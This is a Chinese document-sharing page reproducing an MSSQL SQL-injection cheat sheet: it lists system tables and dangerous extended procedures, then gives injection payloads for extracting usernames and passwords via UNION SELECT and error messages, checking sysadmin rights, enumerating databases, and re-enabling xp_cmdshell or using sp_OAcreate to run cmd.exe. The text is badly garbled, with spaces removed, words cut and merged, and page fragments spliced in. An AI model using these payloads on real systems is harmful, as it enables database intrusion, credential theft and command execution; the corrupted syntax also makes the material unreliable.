非常经典的mssql注射资料

《非常经典的mssql注射资料》由会员上传分享，免费在线阅读，更多相关内容在工程资料-天天文库。

1、非常经典的MsSql注射资料>>教育资源库　　Sql注射总结（早源于'or'1'='1）　　最重要的表名：　　select*fromsysobjects　　sysobjectsncsysobjects　　sysindexestsysindexes　　syscolumns　　systypes　　sysusers　　sysdatabases　　sysxlogins　　sysprocesses　　最重要的一些用户名（默认sql数据库中存在着的）　　public　　dbo　　guest(一般禁止，或者没权限

2、)　　db_sercurityadmin　　ab_dlladmin　　一些默认扩展　　xp_regaddmultistring　　xp_regdeletekey　　xp_regdeletevalue　　xp_regenumkeys　　xp_regenumvalues　　xp_regread　　xp_regremovemultistring　　xp_regedia驱动器相关　　xp_dirtree目录　　xp_enumdsnODBC连接　　xp_loginconfig服务器安全模式信息　　xp_makecab创建压缩卷　　xp_nt

3、sec_enumdomainsdomain信息　　xp_terminate_process终端进程，给出一个PID　　例如：sp_addextendedproc'xp_pxp_foo.dll'execxp_and.asp-c-Slocalhost-Usa-Pfoobar'groupbyusers.idhaving1=1-'groupbyusers.id,users.username,users.passe')-unionselectTOP1login_nameFROMlogintable-u

4、nionselectTOP1passe='Rahul'--构造语句：查询是否存在xp_cmdshell'unionselectversion,1,1,1--and1=(selectVERSION)and'sa'=(selectSystem_user)'unionselectret,1,1,1fromfoo--'unionselectmin(username),1,1,1fromuserse>'a'-'unionselectmin(username

5、),1,1,1fromuserse>'admin'-'unionselectpassuserse='admin'--anduser_name()='dbo'and0<>(selectuser_name()-;DECLAREshellINTEXECSP_OAcreate'32cmd.exe/cusersaster.dbo.sysobjectse='xp_cmdshell');EXECmaster.dbo.sp_addextendedpr

6、oc'xp_cmdshell','xplog70.dll'1=(%20select%20count(*)%20from%20master.dbo.sysobjects%20e='xp_cmdshell')and1=(selectIS_SRVROLEMEMBER('sysadmin'))判断sa权限是否and0<>(selecttop1pathsfromneefrommaster.dbo.1234567下一页>>>>这篇文章来自..，。sysdatabase

7、sethodo,'run',NULL,'cscript.exec：ipubrootmkethodo,'run',NULL,'cscript.exec：ipubrootchaccess.vbs-amaster.dbo.sysdatabasese>1anddbid=6)　　依次提交dbid=7,8,9....得到更多的数据库名　　and0<>(selecttop1namefrombbs.dbo.sysobjectsin　　and0<>(selecttop1n

8、amefrombbs.dbo.sysobjectsenotin('Admin'))来得到其他的表。　　and0<>(selectcount(*)frombbs.dbo.sysobjectse='admin'